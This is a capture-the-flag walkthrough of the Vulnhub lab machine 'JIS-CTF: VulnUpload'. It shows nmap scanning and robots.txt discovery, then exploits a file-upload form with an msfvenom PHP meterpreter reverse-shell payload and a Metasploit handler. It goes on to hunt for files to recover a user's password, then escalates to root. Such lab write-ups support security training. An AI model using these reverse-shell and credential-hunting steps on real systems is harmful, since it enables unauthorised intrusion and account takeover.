Vulnhub JIS-CTF: VulnUpload Writeup

This is a walkthrough of Vulnhub machine ‘JIS-CTF: VulnUpload’ released on Feb 8, 2018, by Mohammad Khreesha. I imported the virtual machine in Virtual Box in Bridged mode. The machine has five flags waiting to be captured en route to “r00t” access.

Attacker IP:
Server IP:

Using Nmap, enumerating for open ports and their respective services

root@kali:~# nmap -sC -sV
Starting Nmap 7.60 ( ) at 2018-03-12 00:26 IST
Nmap scan report for (
Host is up (0.00021s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

Browsing gives

Checking robots.txt file, browsing

root@kali:~# curl
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Browsing gives first flag.

Browsing gives second flag and login credentials

Logging in with the same credentials at gives,

File upload functionality is exploited to get a reverse shell by uploading a meterpreter payload containig php file created using msfvenom.

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=1337 -f raw > shelled.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

Also, setting up a reverse shell handler at port 1337

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 

Uploading the created shelled.php and browsing gives a reverse meterpreter connection

Onto the third flag,

$ pwd    
$ cd ..
$ ls      
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

As suggested in hint to find the user technawi credentials, I enumerated the files owned by user technawi (to be noted, I ignored all warnings)

$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"
$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

Using the obtained credentials, login using SSH to get access with user technawi privileges. Further elevating to root privileges using sudo access.
The fifth flag is obtained in folder /var/www/html.

Leave a Reply

Your email address will not be published. Required fields are marked *